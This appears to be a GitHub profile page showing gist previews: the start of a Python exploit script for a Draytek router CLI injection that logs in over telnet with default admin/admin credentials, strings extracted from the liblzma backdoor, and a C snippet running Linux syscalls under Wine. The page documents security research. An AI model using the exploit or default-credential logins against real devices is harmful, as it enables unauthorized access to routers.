Skip to content

Instantly share code, notes, and snippets.

View q3k's full-sized avatar
🤠
howdy

Serge Bazanski q3k

🤠
howdy
View GitHub Profile
@q3k
q3k / draytek-sploit.py
Created October 8, 2024 11:47
Draytek CLI injection (probably not CVE-2024-41585?)
import pwn
r = pwn.remote('192.168.1.1', 23)
r.recvuntil('Username: ')
r.sendline('admin')
r.recvuntil('Password: ')
r.sendline('admin')
r.recvuntil('vigor> ')
r.sendline('en')
@q3k
q3k / hashes.txt
Last active October 3, 2024 05:12
liblzma backdoor strings extracted from 5.6.1 (from a built-in trie)
0810 b' from '
0678 b' ssh2'
00d8 b'%.48s:%.48s():%d (pid=%ld)\x00'
0708 b'%s'
0108 b'/usr/sbin/sshd\x00'
0870 b'Accepted password for '
01a0 b'Accepted publickey for '
0c40 b'BN_bin2bn\x00'
06d0 b'BN_bn2bin\x00'
0958 b'BN_dup\x00'
@q3k
q3k / cursed.c
Last active April 3, 2024 09:19
Linux syscalls in .exe executed under Wine
#include <stdio.h>
#include <string.h>
const char *buf = "hello from linux\n";
char * const argv[] = {
"/bin/sh",
"-c",
"echo 'hello from execve'",
NULL,
};

Keybase proof

I hereby claim:

  • I am q3k on github.
  • I am q3k (https://keybase.io/q3k) on keybase.
  • I have a public key whose fingerprint is 63DF E737 F078 657C C8A5 1C00 C29A DD73 B356 3D82

To claim this, I am signing this object: